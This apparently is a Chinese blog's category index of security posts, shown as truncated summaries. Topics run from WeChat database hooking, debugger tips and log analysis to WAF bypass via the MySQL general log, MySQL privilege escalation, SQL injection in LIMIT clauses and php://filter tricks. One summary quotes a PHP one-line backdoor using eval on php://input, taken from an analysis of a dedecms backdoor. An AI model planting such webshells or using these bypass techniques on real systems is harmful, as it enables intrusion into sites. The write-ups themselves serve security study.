随笔分类 - 安全维护
摘要:收取消息关键词及内存值分布 原理猜测:根据MsgSvrID本地数据库查询,看有没有到库里,如果有,则记录:addListUniqBySvrId dicard msg because svrid repeat %d,否则开始正常进库,所以Hook的地方,就是根据这个关键词找到函数的头就可以 1).关键
阅读全文
摘要:1.在pc微信数据库Msg表里面,MsgSvrID字段类型是int型,但其实在sqlite3里面,int类型实际上是一个64位整数,其范围是从-9223372036854775808到9223372036854775807。这个范围与标准SQL的INT类型(通常在32位系统中是-2147483648
阅读全文
摘要:1、忽略异常,在选项->选项->异常中添加区间设置0~FFFFFFFF全忽略; 2.查看模块基址 右键-在内存布局中转到 3.类似OD的dd命令哪去了 百度大法了解到x64dbg 中使用dump指令,效果如下
阅读全文
摘要:从nginx日志中获取2014:04:01日 21:30至21:50的日志内容 cat web.log 192.168.16.105 - - [01/Apr/2014:21:26:21 +0800] "GET / HTTP/1.1" 502 172 192.168.16.105 - - [01/Ap
阅读全文
摘要:1、安装giaccess yum -y install goaccess 安装完成后,默认配置文件路径:/etc/goaccess/goaccess.conf 2、修改配置文件,在配置文件的末端添加 time-format %H:%M:%S date-format %d/%b/%Y log-form
阅读全文
摘要:运行下面的命令 wget –no-check-certificate https://raw.githubusercontent.com/teddysun/across/master/l2tp.sh chmod +x l2tp.sh ./l2tp.sh 全默认回车就行,全自动安装,如果没有问题,那就
阅读全文
摘要:亲爱的朋友们,神牛系统正式上线运行。 我们提供微信公众号文章流量统计(国内首家且是唯一一家),微信活码,微信文章裂变,微信红包等等功能。 我们希望我们的产品能很好的服务大家。 欢迎大家踊跃提出意见或者需求 我们将积极采纳并不断完善我们的产品! 神牛系统
阅读全文
摘要:GetAdaptersInfo 和 GetAdaptersAddresses 都能获取网络相关信息,如网卡名称、MAC 地址、IP、DNS、网关等信息,但是两个函数感觉都有一些问题,GetAdaptersInfo 获取不到 IPV6 地址信息,使用起来较为简单,GetAdaptersAddresse
阅读全文
摘要:sc安装服务,启动失败:显示错误1053:服务没有及时响应启动或控制请求 网上找了很多方法资料,什么注册表啊,权限啊之类的。 你按照这些都做完后,仍然提示这个错误。 告诉你,要检查自己的程序是不是有问题!!!!!! 有人可能说,没有问题啊,双击运行都ok的。 这边在告诉你一下。sc安装成服务后,运行
阅读全文
摘要:随着代码安全的普及,越来越多的开发人员知道了如何防御sqli、xss等与语言无关的漏洞,但是对于和开发语言本身相关的一些漏洞和缺陷却知之甚少,于是这些点也就是我们在Code audit的时候的重点关注点。本文旨在总结一些在PHP代码中经常造成问题的点,也是我们在审计的时候的关注重点。(PS:本文也只
阅读全文
摘要:扫描器扫到robots.txt ,访问:http://xxx.com/robots.txt 有一个admin,但访问需要输入账号和密码。 尝试访问: http://xxx.com/index.phps 。得到源代码如下: 对于 REQUEST[‘id′],进行了“严格”的正则匹配,不能正常的注出数据
阅读全文
摘要:今天偶然利用此命令干成了大事,老司机一看就懂命令用法百度搜到的,希望对各位表哥有用echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt::生成 hex.txt,机器码对应的内容是 Hallo World!certutil -decodehex hex.t
阅读全文
摘要:首先环境如下: OS:Windows 2003 WAF:Safe Dog 4.0正式版 phpmyadmin:4.7(许多都可以) Mysql:5.5+ PHP:5.3 Apache:2.x 总结方法如下: outfile被禁止的情况下: show variables like '%general%
阅读全文
摘要:php://filter是PHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也就只好提前分享一下。 XXE中的使用 php://filter之前最常出镜的
阅读全文
摘要:PS.之前一直想把零零碎碎的知识整理下来,作为知识沉淀下来,正好借着wooyun峰会的机会将之前的流程又梳理了一遍,于是就有了下文。也希望整理的内容能给甲方工作者或则白帽子带来一些收获。0x00 概述随着网络安全越来越受到重视,发展越来越快。随之也出现了越来越多的安全防护的软件。例如有:1.云waf...
阅读全文
摘要:最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql...
阅读全文
摘要:从偶然的机会发现一个mysql特性到wooyun waf绕过题MayIKissYou | 2015-06-19 12:00最近在测试的时候,偶然的机会发现了一个mysql的特性,为啥是偶然的机会呢。。。。。一次测试的过程中我在mysql的console下做了如下的操作:看出些什么了么?我当时发现报错...
阅读全文
摘要:from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/此方法适用于MySQL 5.x中,在limit语句后面的注入例如:SELECT[ALL|DISTINCT|DISTINCTROW][HIGH_PRIORITY][STR...
阅读全文
摘要:一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个...
阅读全文
浙公网安备 33010602011771号